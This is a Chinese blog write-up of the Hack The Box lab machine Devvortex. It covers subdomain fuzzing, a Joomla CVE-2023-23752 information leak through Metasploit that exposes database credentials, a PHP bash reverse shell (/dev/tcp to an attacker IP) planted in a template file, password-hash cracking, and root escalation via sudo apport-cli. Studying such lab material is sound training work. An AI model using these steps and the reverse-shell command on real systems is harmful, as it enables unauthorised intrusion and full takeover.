HTB-Devvortex

最新推荐文章于 2024-07-20 22:27:15 发布
最新推荐文章于 2024-07-20 22:27:15 发布
阅读量353 收藏 7
点赞数 6
文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73373164/article/details/136590691
版权

title: HTB-Devvortex
date: 2023-12-14 16:15:11
categories: HTB
tag: 渗透

Devvortex

本题知识简介

Joomla未授权访问漏洞(CVE-2023-23752):
适用版本
4.0.0 <= Joomla <= 4.2.7
构造路由
/api/index.php/v1/config/application?public=true

apport-cli提权
信息收集

使用nmap进行扫描同时使用浏览器进行访问

修改hosts

10.10.11.242 devvortex.htb

然后去扫目录没有什么可用信息

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://devvortex.htb/FUZZ
Total requests: 45524

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   301        7 L      12 W       178 Ch      "images"
000000002:   301        7 L      12 W       178 Ch      "css"
000000004:   301        7 L      12 W       178 Ch      "js"

Total time: 262.5244
Processed Requests: 5190
Filtered Requests: 5187
Requests/sec.: 19.76958

在去扫描子域名获得子域名

通过wfuzz去扫描子域名

wfuzz -w 指定字典 -u "http://devvortex.htb" -H "Host:FUZZ.devvortex.htb" --hl 7

000000499:   200        501 L    1581 W     23221 Ch    "dev"

加入hosts然后去访问

10.10.11.242 dev.devvortex.htb

nmap扫描结果如下

Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-14 16:28 中国标准时间
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.35s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 81.91 seconds

扫描子域名目录

扫出来了

000000001:   301        7 L      12 W       178 Ch      "images"
000000040:   301        7 L      12 W       178 Ch      "modules"
000000033:   301        7 L      12 W       178 Ch      "includes"
000000037:   301        7 L      12 W       178 Ch      "language"
000000026:   301        7 L      12 W       178 Ch      "plugins"
000000013:   301        7 L      12 W       178 Ch      "templates"
000000091:   301        7 L      12 W       178 Ch      "media"
000000006:   200        501 L    1581 W     23221 Ch    "index.php"
000000058:   301        7 L      12 W       178 Ch      "cache"
000000138:   301        7 L      12 W       178 Ch      "tmp"
000000132:   200        29 L     105 W      764 Ch      "robots.txt"
000000151:   301        7 L      12 W       178 Ch      "administrator"
000000201:   200        74 L     540 W      4940 Ch     "README.txt"
000000198:   301        7 L      12 W       178 Ch      "libraries"
000000209:   403        7 L      10 W       162 Ch      ".DS_Store"
000000243:   200        0 L      0 W        0 Ch        "configuration.php"
000000217:   301        7 L      12 W       178 Ch      "components"
000000339:   200        172 L    1008 W     6858 Ch     "htaccess.txt"
000000588:   200        501 L    1581 W     23221 Ch    "home"
000000925:   403        7 L      10 W       162 Ch      ".htpasswd"
000001005:   200        339 L    2968 W     18092 Ch    "LICENSE.txt"
000001109:   301        7 L      12 W       178 Ch      "cli"
000001149:   403        7 L      10 W       162 Ch      ".thumbs"

访问readme.txt能够指定服务信息

访问robots.txt得到几个路由

User-agent: *
Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

访问/administrator/是个登录框需要密码

那么我们在网上找这个漏洞

反弹shell

并且使用msfconsole来打

use scanner/http/joomla_api_improper_access_checks

 ID   Super User  Name        Username  Email                Send Email  Register Date    Last Visit Date  Group Names
 --   ----------  ----        --------  -----                ----------  -------------    ---------------  -----------
 649  *           lewis       lewis     lewis@devvortex.htb  1           2023-09-25 16:4  2023-12-14 08:5  Super Users
                                                                         4:24             8:39
 650              logan paul  logan     logan@devvortex.htb  0           2023-09-26 19:1                   Registered
                                                                         5:42

[+] Config JSON saved to /home/iliy/.msf4/loot/20231214171300_default_10.10.11.242_joomla.config_395747.bin
[+] Joomla Config
=============

 Setting        Value
 -------        -----
 db encryption  0
 db host        localhost
 db name        joomla
 db password    P4ntherg0t1n5r3c0n##
 db prefix      sd4fg_
 db user        lewis
 dbtype         mysqli

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

得到数据库账号和密码

然后登录点击system然后在templates的第一个里面修改代码,index.php只有读取权限写入不了那我们写error.php一样的

写入

system('bash -c "bash -i >& /dev/tcp/10.10.14.54/9999 0>&1"');

然后

nc -lvnp 9999

在根据这个路径进行访问即可得到shell

查看一下用户

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
fwupd-refresh:x:113:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
logan:x:1000:1000:,,,:/home/logan:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false

查看到有/bin/bash的用户有

root:x:0:0:root:/root:/bin/bash
logan:x:1000:1000:,,,:/home/logan:/bin/bash

现在我们的目标就是logan

然后通过一开始获得的账号密码登录mysql

在select * from sd4fg_user得到logan的密码串,然后通过john进行解密

得到了logan密码

爆破出密码是tequieromucho

获取到logan的密码后登录

提交user.txt

提权

然后sudo -l

logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli

通过

sudo /usr/bin/apport-cli -c test.log less
V
!/bin/bash

获取到root权限

c0iq
关注
  • 6
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 555
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 590
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 813
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 820
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
园区道路车辆智能管控视频解决方案,打造安全畅通的园区交通环境
TSINGSEE青犀视频官方技术博客
07-16 842
AI智能分析网关V4消防通道占用算法基于人工智能视觉分析技术,通过摄像头实时监测识别是否有机动车违规停放在消防车通道上,并及时提醒管理人员进行处理。
防火墙--内容安全
最新发布
banliyaoguai的博客
07-20 370
内容安全是指对互联网上的内容进行监测、筛选和管理,以确保用户在浏览、使用互联网内容时的安全和合法性。各个厂商在进行内容安全的检测、分析和处理的过程被称为引擎。下面以华为IAE引擎来对内容安全进行学习ID:区分不同的签名对象:服务器,客户端。一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性:该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序:这种攻击所承载的协议或者应用。
数据库安全审计系统:筑牢数据安全防线 提高数据资产安全
2401_82472120的博客
07-17 449
其可以监控和审计用户对数据库中的数据库表、视图、序列、包、存储过程、函数、库、索引、同义词、快照、触发器等的访问、创建、修改和删除等,分析的内容可以精确到SQL操作语句级别。另外,它还可以根据设置的规则,智能判断出违规操作数据库的行为,并对违规行为进行记录、报警。通过对用户访问数据库行为的记录、分析和汇报,来帮助用户事后生成合规报告、事故追根溯源,同时通过大数据搜索技术提供高效查询审计报告,定位事件原因,以便日后查询、分析、过滤,实现加强内外部数据库网络行为的监控与审计,提高数据资产安全
响应“一机两用”政策号召 提高政务内外网安全
Canon_YK的博客
07-17 911
随着一机两用政策的实施,即政府部门内部网络终端在特定情况下需同时连接政务内外网,如何在保证工作效率的同时,确保网络安全和数据安全,成为摆在面前的重要课题。未来,随着技术的不断发展和完善,沙箱技术将在政务内外网安全中发挥更加重要的作用。深信达的SDC沙箱技术已经和多个政企单位合作,高效便捷的沙箱技术已经大大提升了政务机关的内网安全,为政务机关业务的开展提供了强有力的安全保障。SDC沙箱技术能够对隔离环境中的网络行为进行实时监控和审计,包括网络连接的建立、数据的传输、应用程序的运行等。
保障低压设备安全!中国星坤连接器精密工艺解析!
weixin_50506145的博客
07-16 541
随着技术的发展,对连接器的需求也在不断提升,特别是在低电压应用领域。中国星坤最新推出的低压连接器,以其精密性和安全性,为低电压设备提供了一个可靠的连接解决方案。中国星坤的低压连接器,以其卓越的性能和广泛的应用前景,为低电压设备的安全稳定运行提供了有力保障。随着技术的不断进步和市场需求的增长,低压连接器将在更多领域展现其独特的价值,成为连接现代电子世界的可靠伙伴。:在医疗领域,低压连接器用于连接各种便携式医疗监测设备,确保数据传输的准确性和设备的稳定性。:由于设计简洁,连接器的维护和更换变得简单快捷。
安全防御:防火墙基本模块
zhugedali_的博客
07-16 865
它会检查每个传入和传出的数据包的头部信息,包括源 IP 地址、目的 IP 地址、源端口、目的端口、协议类型(如 TCP、UDP、ICMP 等)以及数据包的标志位等。如果允许,防火墙会创建一个状态表项来记录该连接的状态,包括连接的方向、数据包的序列号等。- IDS/IPS 模块通常使用多种检测技术,包括基于特征的检测、基于异常的检测和基于协议分析的检测等,以提高检测的准确性和有效性。- 日志模块负责记录防火墙处理的所有活动和事件,包括数据包的过滤决策、连接的建立和终止、管理员的操作等详细信息。
游戏外挂的技术实现与五年脚本开发经验分享
m0_62996549的博客
07-19 533
引言: 在数字娱乐的浪潮中,电子游戏成为许多人生活中不可或缺的一部分。然而,随着游戏的普及,一些玩家为了追求更高效的游戏体验或不正当竞争优势,开始使用游戏外挂程序。这些外挂往往通过修改游戏正常运行机制来提供非法优势给使用者。作为拥有五年脚本开发经验的技术人员,我深知探索这一领域需要严谨的态度和对技术的尊重。本文将探讨游戏外挂的技术实现方法,并分享我在脚本开发领域的经验。
【Java安全】基础配置篇-01
jayq1的博客
07-19 1074
Java安全基础学习篇
安全防御---防火墙综合实验3
难~赴
07-16 533
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW113,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M14,销售部保证email应用在办公时间至少可以使用10M的带宽,每个人至少1M15,移动链路采用的是100M的带宽,要求游客区用户仅能占用50M,并且基于在线地址进行动态均分。
F5理念左移,实现API安全的全生命周期管理
hanniuniu13的博客
07-17 306
作为F5安全产品组合的一部分(该产品组合包含大型硬件、软件、SaaS和托管服务),不仅提供了业界领先的应用交付能力,还提供了适用于任意环境下的分布式应用和API的应用安全能力。F5的应用安全功能恰好能解决这一痛点,不仅为企业提供全方位的API安全防护和控制,还与AWS、Azure、阿里云等集成,为这些环境提供更好的业务可靠性和业务应用层面的安全性,采购的模型从以往永久的采购模型变成了可订阅的销售模型,使得选用F5的时候更灵活。面对如此复杂的形势,F5安全理念正在左移,以应对API安全威胁。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值